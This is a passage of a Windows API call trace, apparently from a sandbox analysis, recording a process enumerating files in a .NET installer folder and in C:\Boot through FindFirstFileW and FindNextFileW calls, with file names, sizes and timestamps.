ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate7.ico", cAlternateFileName="")) returned 1 [0045.897] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate8.ico", cAlternateFileName="")) returned 1 [0045.897] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Save.ico", cAlternateFileName="")) returned 1 [0045.898] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x8f66, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.ico", cAlternateFileName="")) returned 1 [0045.898] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b5e7f00, ftCreationTime.dwHighDateTime=0x1ca927c, ftLastAccessTime.dwLowDateTime=0x5b5e7f00, ftLastAccessTime.dwHighDateTime=0x1ca927c, ftLastWriteTime.dwLowDateTime=0x5b5e7f00, ftLastWriteTime.dwHighDateTime=0x1ca927c, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x0, dwReserved1=0x0, cFileName="stop.ico", cAlternateFileName="")) returned 1 [0045.898] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SysReqMet.ico", cAlternateFileName="SYSREQ~1.ICO")) returned 1 [0045.898] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SysReqNotMet.ico", cAlternateFileName="SYSREQ~2.ICO")) returned 1 [0045.898] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x0, dwReserved1=0x0, cFileName="warn.ico", cAlternateFileName="")) returned 1 [0045.898] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x0, dwReserved1=0x0, cFileName="warn.ico", cAlternateFileName="")) returned 0 [0045.898] FindClose (in: hFindFile=0x4260388 | out: hFindFile=0x4260388) returned 1 [0045.901] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.901] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0xe2c, dwReserved0=0x0, dwReserved1=0x240000, cFileName="header.bmp", cAlternateFileName="")) returned 1 [0045.901] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x66ea7e00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0xad1384b, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Core.mzz", cAlternateFileName="NETFX_~1.MZZ")) returned 1 [0045.901] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0xc183da00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d0200, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Core_x64.msi", cAlternateFileName="NETFX_~1.MSI")) returned 1 [0045.901] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4c130c00, ftCreationTime.dwHighDateTime=0x1cac6d9, ftLastAccessTime.dwLowDateTime=0x4c130c00, ftLastAccessTime.dwHighDateTime=0x1cac6d9, ftLastWriteTime.dwLowDateTime=0x4c130c00, ftLastWriteTime.dwHighDateTime=0x1cac6d9, nFileSizeHigh=0x0, nFileSizeLow=0x11c000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Core_x86.msi", cAlternateFileName="NETFX_~2.MSI")) returned 1 [0045.901] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf7cd9415, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x29222c7, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Extended.mzz", cAlternateFileName="NETFX_~2.MZZ")) returned 1 [0045.902] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2dbe0800, ftCreationTime.dwHighDateTime=0x1cac6fb, ftLastAccessTime.dwLowDateTime=0x2dbe0800, ftLastAccessTime.dwHighDateTime=0x1cac6fb, ftLastWriteTime.dwLowDateTime=0x2dbe0800, ftLastWriteTime.dwHighDateTime=0x1cac6fb, nFileSizeHigh=0x0, nFileSizeLow=0xd5000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Extended_x64.msi", cAlternateFileName="NETFX_~3.MSI")) returned 1 [0045.902] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7626f700, ftCreationTime.dwHighDateTime=0x1cac6f6, ftLastAccessTime.dwLowDateTime=0x7626f700, ftLastAccessTime.dwHighDateTime=0x1cac6f6, ftLastWriteTime.dwLowDateTime=0x7626f700, ftLastWriteTime.dwHighDateTime=0x1cac6f6, nFileSizeHigh=0x0, nFileSizeLow=0x79000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="netfx_Extended_x86.msi", cAlternateFileName="NETFX_~4.MSI")) returned 1 [0045.902] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4a0f7400, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x4a0f7400, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x4a0f7400, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x426ae, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ParameterInfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0045.902] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x19dedd00, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x19dedd00, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x19dedd00, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x2d200, dwReserved0=0x0, dwReserved1=0x240000, cFileName="RGB9RAST_x64.msi", cAlternateFileName="RGB9RA~1.MSI")) returned 1 [0045.903] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x177c8300, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x177c8300, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x177c8300, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x17200, dwReserved0=0x0, dwReserved1=0x240000, cFileName="RGB9Rast_x86.msi", cAlternateFileName="RGB9RA~2.MSI")) returned 1 [0045.903] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x13148, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Setup.exe", cAlternateFileName="")) returned 1 [0045.903] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0xc5158, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SetupEngine.dll", cAlternateFileName="SETUPE~1.DLL")) returned 1 [0045.903] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x48150, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SetupUi.dll", cAlternateFileName="")) returned 1 [0045.903] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5381000, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x5381000, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x5381000, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x75a8, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SetupUi.xsd", cAlternateFileName="")) returned 1 [0045.903] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6519be00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0x6519be00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0x6519be00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x17758, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SetupUtility.exe", cAlternateFileName="SETUPU~1.EXE")) returned 1 [0045.903] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0xa078, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SplashScreen.bmp", cAlternateFileName="SPLASH~1.BMP")) returned 1 [0045.903] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x143bc400, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0x143bc400, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x143bc400, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x23420, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0045.903] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3704, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Strings.xml", cAlternateFileName="")) returned 1 [0045.904] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x97f2, dwReserved0=0x0, dwReserved1=0x240000, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0045.904] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0x19688, dwReserved0=0x0, dwReserved1=0x240000, cFileName="watermark.bmp", cAlternateFileName="WATERM~1.BMP")) returned 1 [0045.904] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x2120bc00, ftLastWriteTime.dwHighDateTime=0x1cac6c9, nFileSizeHigh=0x0, nFileSizeLow=0x4f5113, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.0-KB956250-v6001-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0045.904] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x1bbe7400, ftLastWriteTime.dwHighDateTime=0x1cac6bf, nFileSizeHigh=0x0, nFileSizeLow=0x217520, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.0-KB956250-v6001-x86.msu", cAlternateFileName="WINDOW~2.MSU")) returned 1 [0045.904] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x5b8e5700, ftLastWriteTime.dwHighDateTime=0x1cac6d1, nFileSizeHigh=0x0, nFileSizeLow=0x4db1ce, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.1-KB958488-v6001-x64.msu", cAlternateFileName="WINDOW~3.MSU")) returned 1 [0045.904] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 1 [0045.904] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 0 [0045.904] FindClose (in: hFindFile=0x42602c8 | out: hFindFile=0x42602c8) returned 1 [0045.904] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3c00050 | out: hHeap=0x5d0000) returned 1 [0045.905] FindNextFileW (in: hFindFile=0x5e9918, lpFindFileData=0x2e4fcf8 | out: lpFindFileData=0x2e4fcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0045.905] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3c00050 [0045.905] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef9d311c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x4260148 [0045.906] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef9d311c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0045.906] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xac3efa99, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0xac3efa99, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD", cAlternateFileName="")) returned 1 [0045.907] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0045.907] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0045.907] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0045.907] FindNextFileW (in: hFindFile=0x4260148, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0045.907] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.907] FindFirstFileW (in: lpFileName="C:\\Boot\\bg-BG\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260588 [0045.908] FindNextFileW (in: hFindFile=0x4260588, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.908] FindNextFileW (in: hFindFile=0x4260588, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", 